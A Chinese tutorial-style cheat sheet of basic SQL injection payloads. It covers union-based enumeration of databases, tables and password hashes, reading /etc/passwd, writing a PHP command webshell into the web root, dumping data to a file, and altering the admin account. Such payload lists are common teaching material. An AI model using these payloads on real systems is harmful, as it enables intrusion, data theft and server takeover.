SQL注入基础语句大全
尽管语句很多,但是上手操作才是硬道理,话不多说直接进行SQL注入基础介绍。
原理:服务器端程序将用户输入参数作为查询条件,直接拼接SQL语句,并将查询结果返回给客户端浏览器。
一:
用户登陆判断语句:
SELECT * FROM users WHERE user='uname' AND password='pass' SELECT * FROM users WHERE user='name' AND password='' OR ''=''
基于报错的检测方法(low)——>能注入就不会报错
' " % ( )
基于布尔的检测
1' and '1'='1
1' and '1
1' and '1'='2
1' and '0
#类似:select first_name,surname from users where id=' '(单引号中是:1' and '1'='1 将两个单引号再次闭合。意思是,id=1是真后面也是真,这是构造逻辑与运算;逻辑或运算?)
检测表列数/显示信息位于哪一列
' order by 9--+
#按查询序列号排序(注释符:--)select *时表字段数=查询字段数
联合查询:
' union select 1,2--+
' union all select database(),2--+
#单引号用于闭合
二:
联合查询内容列举:
' union select database(),substring_index(USER(),"@",1)--
DB用户:user()
DB版本:version()
(' union select user(),version()-- )
全局函数:@@datadir、@@hostname、@@VERSION、@@version_compile_os
(' union select user(),@@datadir-- 等等)
当前库:database()
(' union select user(),database()-- )
ASCII转字符:char()
(' union select user(),char(55)--+ 把数值输入里面,ASCII码注入)
连接字符串(联合查询):CONCAT_WS(CHAR(32,58,32),user(),database(),version())
(' union select CONCAT_WS(CHAR(32,58,32),user(),database(),version()),null--+)
计算哈希:md5()
(' union select CONCAT_WS(CHAR(32,58,32),user(),database(),version()),md5('a')--+)
三:
Mysql数据结构简介:
information_schema——>源数据库,数据库结构的管理者。(每个结构存储数据)
(包含数据库管理系统内的所有信息,不是数据,是本身信息;包含字段、表、有多少表等等)
搜友库所有表/统计每库中表的数量:
' union select table_name,table_schema from information_schema.tables--+
' UNION select table_schema,count(*) FROM information_Schema.tables group by table_schema --
数据库中的表名
' union select table_name,table_schema from information_schema.tables where table_schema='数据库'--+
Users表中的所有列(user_id、first_name、last_name、user、password、avatar)
' union select table_name,column_name from information_schema.columns where table_schema='数据库' and table_name='users'--+
查询user、password列的内容
' union select user,password from 数据库.users--+
' union select user,password from users--+
' union select null, concat(user,0x3a,password) from users--+
读取文件
' union SELECT null, load_file('/etc/passwd')--+
#命令读取本地数据库文件
写入文件
' union select null,"<?php passthru($_GET['cmd']); ?>" INTO DUMPFILE "/var/ www/a.php" --+
#直接写写不进去
保存下载数据库
' union select null, concat(user,0x3a,password) from users INTO OUTFILE '/ tmp/a.db'-
猜列名
' and column is null--+
猜当前表表名
' and table.user is null--+
猜库里其它表
' and (select count(*) from table)>0--+
列表对应关系
' and users.user is null--+
猜字段内容
' or user='admin (输入完全正确的字段猜解)
' or user like ' %a% (大概的字段,只要有a的都查)
猜账号对应密码
' or user='admin' and password='5f4dcc3b5aa765d61d8327deb882cf99
#密码需要进行加密处理
#(猜解类似于暴力破解密码,猜解区别就是需要有webapplication输入字符有返回错误提示信息,可用fuzz功能)
当数据库可写(因无法破解所知账号的md5密码,但是数据库中的表可以写入,那么写入一个账号+md5密码)
'; update users set user='jerome' where user='admin
......
实际上还有很多作用的SQL语句,实在是写不下去了,太多太多,网上也有很多,如果我仅仅复制下来那也阻碍了大家自己的发现,说全面也不太可能,每个语句都是被发现写出来的,如果说介绍完全部注入语句,那几天几夜我也写不完,语句都是被写出来的,清楚原理,掌握知识我们就能自己写出适合使用的语句,基础语句仅仅只是带着入门。
SQL注入基础语句大全相关推荐
- sql server基础语句大全
一.基础 1.说明:创建数据库 CREATE DATABASE database-name 2.说明:删除数据库 drop database dbname 3.说明:备份sql server - 创建 ...
- SQL注入 基础概述及相关知识
SQL注入 基础概述及相关知识 SQL注入概述 SQL注入攻击简介 SQL注入攻击原理 SQL注入攻击来源 SQL注入攻击主要特点 SQL注入攻击危害 SQL注入攻击 SQL注入攻击基础概述 SQL注 ...
- SQL注入基础原理与案例(详细总结)
SQL注入基础原理与案例 一.前言 二.漏洞概述及危害 1.漏洞概述 2.漏洞危害 3.漏洞防范 三.SQL注入 1.SQL注入方式 (1)信息收集 (2)数据注入 (3)高权限注入 2.判断是否存在 ...
- 学一点SQL注入基础
文章目录 学一点SQL注入基础 思维导图 注入原理 MySQL三种注释 MySQL三种注入方式 联合查询注入 确定字段数 常规步骤 sqlmap的使用 跨库注入 MySQL注入获取最高权限-文件操作 ...
- SQL注入基础--判断闭合形式
这里写自定义目录标题 ** **SQL注入基础--判断闭合形式** ## 1.整形闭合 2.单引号闭合 3.双引号闭合 总结 ** SQL注入基础–判断闭合形式 SQL语句的闭合形式大概如下几种: S ...
- 渗透测试之SQL注入基础
渗透测试之SQL注入基础 SQL注入类型 按照数据类型类型来分类 按照执行效果来分类(页面回显效果) 按照数据提交的方式来分类 判断注入类型的方法 MySQL注入基础 联合查询注入 布尔注入 时间盲注 ...
- Wmm的学习日记(SQL注入基础)
这周听了一节三个半小时的网课,有关sql注入,消除了我对sql注入的"恐惧",也算是浅浅入了下门吧,虽然学会了点皮毛,但是还是成就感满满,哈哈哈,从0到0.001也是一件值得庆祝的 ...
- SQL注入基础知识总结
SQL注入-基础知识总结 1.注释符 1.1.Mysql中注释符有三种 1.2.总结 2.information_schema库 2.1.了解information_schema库 2.2.常用注入语 ...
- SQL 分页查询语句大全即(查找第N到M条记录的方法)
SQL 分页查询语句大全即(查找第N到M条记录的方法) 第一种方法,我的原创方法 row=2 表示分页行数 page=1 表示页码 getnum=row*page select * from (se ...
- sql注入基础原理(SQL injection)
sql注入基础原理 文章目录 sql注入基础原理 Sql注入简介 案例表 产生sql注入的写法 python 相关 java 相关 php 相关 sql注入相关技术 B: 基于布尔的盲注特征 案例 总 ...
最新文章
- 中音萨克斯指法表图_萨克斯的几个特殊指法记忆和几个概念
- java中select的用法_mybaties中select用法,以及常用增删改查
- linux本地时间与utc不一致_Linux下CST和UTC时间的区别以及不一致的解决方法
- 第6章 数组、指针与字符串(二)指针与函数
- Jenkins Pinned Plugins(Jenkins绑定插件)
- XRD结果如何做定量相分析
- 缺失值处理 - 定位空值并用空值的上一个值填充 - (Excel)
- 面试——嵌入式面试内容和注意事项
- 点击上下左右按钮让背景上下左右移动
- 统计学理论—一元线性回归
- C++实现各种进制转换
- vim设置自动保存快捷键、执行当前正在编写的Shell脚本快捷键
- js根据身份证获取年龄
- 四川2021年高考成绩位次查询,2021年填报志愿数据:四川所有本科大学近三年分数线、对应位次排行榜...
- ht城市介绍人口数量Html,城市人口热力图 城市热力图查询
- 新电脑自带win11刷win10 系统之后出现的触摸屏/板失灵等问题
- ROS IDE —— RoboWare Studio
- java线上培训机构排名前十,重要概念一网打尽!
- MongoDB Project(投影字段)
- Objective C 类别(Category)与类扩展(Extensions)
热门文章
- 鸿沟理论(The Chasm Theory)介绍
- Python 实现PID控制一阶惯性系统
- H3CSE路由-配置OSPF高级
- IT书籍电子书下载网站
- maya中英文对照_Maya中英文对照
- c#读取mysql返回的值类型_C#中Mysql读取字段值
- android swf 播放器 源码,Android 9.0 flash播放器播放swf源码讲解
- Android开发中需要用到的常见APP对应包名
- 使用google service定位服务
- 【错误记录】springboot项目报错Field xxx in com.xx.xx.xx.impl.xxImpl required a bean